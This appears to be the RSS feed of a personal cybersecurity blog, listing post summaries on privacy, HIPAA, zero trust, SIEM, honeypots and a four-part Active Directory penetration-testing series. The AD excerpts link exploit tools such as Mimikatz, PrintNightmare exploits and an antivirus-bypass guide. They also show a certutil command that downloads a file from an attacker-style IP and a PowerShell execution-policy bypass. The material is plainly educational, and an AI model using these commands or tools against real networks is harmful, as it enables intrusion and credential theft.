auti.dev ≽^._.^≼ ∫
https://auti.dev/
Recent content on auti.dev (Hugo, en-US). Copyright © 2023 - 2025, Atharva Auti. Last updated Wed, 22 Jan 2025 12:50:00 -0800.

What Data Is Out There? - Uber & Lyft
https://auti.dev/what-data-is-out-there-uber-lyft/
Wed, 22 Jan 2025 12:50:00 -0800
Introduction: In an increasingly data-driven world, companies like Uber and Lyft have become essential services, revolutionizing transportation. However, with their global reach and tech-driven platforms, these ride-hailing giants collect and process vast amounts of sensitive personal data from users, drivers, and third parties. In this report, we explore and compare the privacy practices of Uber and Lyft, focusing on the types of data collected, its storage, sharing mechanisms, retention policies, and potential uses.

HIPAA Unveiled
https://auti.dev/hipaa-unveiled/
Wed, 20 Nov 2024 10:50:45 -0800
The Digital Frontier of Healthcare Privacy: Picture this: it's 3 AM, and somewhere in a healthcare network, millions of sensitive patient records are being transmitted, stored, and protected. Behind this intricate dance of data lies HIPAA, the Health Insurance Portability and Accountability Act, a regulatory powerhouse that has revolutionized healthcare data protection. Why HIPAA Matters in the Age of Cyber Vulnerability: In an era where a single data breach can expose millions of patient records, HIPAA stands as a critical line of defense.

Shepherd
https://auti.dev/shepherd/
Tue, 15 Oct 2024 09:00:00 -0800
The Inspiration Behind Shepherd: Decentralized finance (DeFi) and smart contracts have transformed the financial landscape, offering innovative, permissionless transactions. However, with this innovation comes significant security risk. High-profile exploits, such as the infamous Poly Network hack where attackers stole over $600 million, highlight the weaknesses of current security measures. Most smart contract audits rely on static analysis, which often fails to detect complex vulnerabilities. That's where Shepherd comes in: a dynamic, affordable security solution that proactively tests smart contracts under real-world conditions, adding a crucial layer of defense.

Zero Trust Architecture
https://auti.dev/zero-trust-architecture/
Sun, 15 Sep 2024 12:00:00 +0530
First talk, on 14th September 2024, at the University of Southern California, Los Angeles. Presentation: docs.google.com
I had the privilege of delivering a talk for DSCI 519 at USC. We introduced the concept of Zero Trust Architecture (ZTA) and its role in building high-assurance systems. This session explored the core principles of ZTA, including identity-centric security, micro-segmentation, and continuous monitoring, demonstrating how these concepts fortify system security and minimize risk. We detailed a systematic approach to developing ZTA, from system inventory and risk mapping to secure communication and incident response automation.

Trusted Computing Base - Mindmap
https://auti.dev/trusted-computing-base-mindmap/
Tue, 03 Sep 2024 10:00:25 -0800
A Trusted Computing Base (TCB) is the totality of the protection mechanisms within a system or architecture that work together to enforce a security policy.
Definition, simplified:
- Totality: ALL
- Protection mechanisms: hardware (TPM), firmware (code signing), software (anti-virus)
Figure: Mindmap for TCB
A Trusted Computing Base comprises all of the protection mechanisms: people, processes, technology.
Reference Monitor Concept (RMC): A reference monitor is an access control concept of an abstract machine that mediates all accesses to objects by subjects.

Cloud Security Basics
https://auti.dev/cloud-security-basics/
Sat, 15 Jun 2024 12:00:00 +0530
First seminar, on 24th June 2024, at Mumbai University. Presentation: docs.google.com
I had the honor of delivering a talk at SAKEC, Mumbai University, where I introduced the fundamental concepts of cloud computing. This session delved into the core principles of cloud architecture, service models, and deployment strategies, providing a comprehensive overview of how cloud technology is transforming the IT landscape. Through practical examples and real-world scenarios, I highlighted the benefits of cloud adoption and discussed the key considerations for securing cloud environments.

GenSecOps
https://auti.dev/gensecops/
Wed, 15 May 2024 12:00:00 -0800
Revolutionizing Security Testing with Generative AI in DevSecOps: In today's fast-paced software development environment, integrating security into the lifecycle is no longer optional; it's a necessity. DevSecOps, which combines software development, security, and IT operations, has emerged as a key methodology for making security an integral part of development workflows. Yet traditional security testing methods remain slow, manual, and often incapable of keeping up with the dynamic pace of modern development.

MobSecOps
https://auti.dev/mobsecops/
Sat, 20 Apr 2024 09:00:00 -0800
A Comprehensive Android Security Framework: In today's interconnected world, mobile applications are central to our personal and professional lives. However, the rise in mobile app usage is paralleled by increasingly sophisticated cyber threats. Traditional tools, while effective, often fail to keep up with these evolving vulnerabilities. Recognizing this gap, we developed MobSecOps, an advanced Android security framework tailored to the OWASP Mobile Top 10 2023 vulnerabilities. It combines static and dynamic analysis with AI-driven insights to deliver a comprehensive security solution.

Demystifying Elastic SIEM
https://auti.dev/demystifying-elastic-siem/
Tue, 17 Oct 2023 12:35:53 +0530
Introduction: Hey there! Following my recent presentation at the Elastic Community Event, I'm thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we'll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and the Apache web server. All of this is orchestrated within the dependable Proxmox stack and Debian server containers.

Leveraging Cybersecurity using ElasticSearch
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
Tue, 17 Oct 2023 12:35:53 +0530
First talk, on 14th October 2023, at the Elastic Community Event, Mumbai. Presentation: docs.google.com
This talk is all about how one can leverage cybersecurity and create awesome tools and integrations using ElasticSearch's built-in integrations. These integrations can be used with pre-existing open source as well as proprietary cybersecurity tools like Suricata, Snort, etc. Beyond specialized cybersecurity tools, there is also an Apache Web Server integration that can monitor an Apache2 instance for access and error logs.

HoneyTrack
https://auti.dev/honeytrack/
Sat, 19 Aug 2023 14:28:54 +0530
Honeypot with a twist of Red Teaming: With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are currently one of the most discussed topics in the field of cyber security. HoneyTrack is a combined honeypot and SIEM tool that uses technologies such as Docker, shell scripts, Python, Elasticsearch, Kibana, and Filebeat to protect an organization's database and to trace the attacker back once they intrude into the target network.

OWASP Top 10
https://auti.dev/owasp-top-10/
Wed, 15 Feb 2023 12:22:44 +0530
First talk, on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics. Presentation: docs.google.com
I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP Top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.

Useful AD Resources
https://auti.dev/useful-ad-resources/
Fri, 20 Aug 2021 12:35:53 +0530
Downloads and Tools:
- Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
- Mitm6: https://github.com/fox-it/mitm6
- Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
- Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
- Mimikatz: https://github.com/gentilkiwi/mimikatz
- PRET: https://github.com/RUB-NDS/PRET
- Praeda: https://github.com/percx/Praeda
- SYSVOL Script: https://support.microsoft.com/en-us/kb/2962486
- LAPS: https://www.microsoft.com/en-us/download/details.aspx?id=46899
- cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
- calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
Articles and Blogs:
- Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
- Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
- mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
- Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
- Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
- A Pen Tester's Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
- Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
- GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/

Compromising AD - Part 4: Post Exploitation
https://auti.dev/compromising-ad-part-4-post-exploitation/
Tue, 17 Aug 2021 12:35:53 +0530
Contents: Post Exploitation; File-Transfers; Maintaining-Access; Pivoting (Setup and Pivot!); Cleanup (make the system/network as it was when you entered it). Next >> Useful Active Directory Resources
File-Transfers:
- Certutil: certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt
- HTTP: change to the directory you want to host, then run python -m SimpleHTTPServer [port]; in a browser, navigate directly to the file (use %20 for spaces).
- FTP: on the attacker machine, run python -m pyftpdlib 21; on the victim machine, browse to

Compromising AD - Part 3: Post Compromise Attacks
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Mon, 16 Aug 2021 12:35:53 +0530
Contents: passthehash (??? WTF; Mitigations); Token-Impersonation (What are tokens?; Two types; Setup; Mitigations); Kerberoasting (Kerberoast?; Mitigations); GPP-cPassword-Attacks (Group Policy Preferences Attack aka MS14-025; Resources; Setup; Exploiting the "Active" machine on HackTheBox; Privesc that machine!; Mitigations); URL-File-Attacks (SCF and URL file attack against a writeable share; Mitigations); Print-Nightmare (Resources; Exploit; Mitigation - just disable the damn service!; Installation; Exploit); Mimikatz (What's that?; Resources; Exploit); Golden-Ticket-Attack (What is a Golden Ticket?; Exploit; Mitigations); Zero-Logon aka CVE-2020-1472 (Resources; Exploit; Mitigations). Next >> Part 4: Post Exploitation
passthehash: If we crack a password and/or dump the SAM hashes, we can leverage both for lateral movement in networks!

Compromising AD - Part 2: Post Compromise Enumeration
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
Sun, 15 Aug 2021 12:37:53 +0530
Contents: Powerview (Requirements; Enumeration); Bloodhound (Setup; Enumeration). Next >> Part 3: Post Compromise Attacks
Powerview
Requirements: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Enumeration: Load up a command prompt, cd into Downloads, and run:
powershell -ep bypass
(-ep is ExecutionPolicy, which stops us from executing scripts; bypass - bypass :) )
Load PowerView:
. .\Powerview.ps1
Fundamental commands:
Get-NetDomain // Returns information about the domain
Get-NetDomainController // Returns information about the DC
Get-DomainPolicy // Returns domain policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy)

Compromising AD - Part 1: Initial Attack Vectors
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
Sun, 15 Aug 2021 12:35:53 +0530
Introduction: In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization's infrastructure. Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, drawing on insights from the TCM Security course to describe the vulnerabilities, attack vectors, and, crucially, robust strategies for fortification and defense.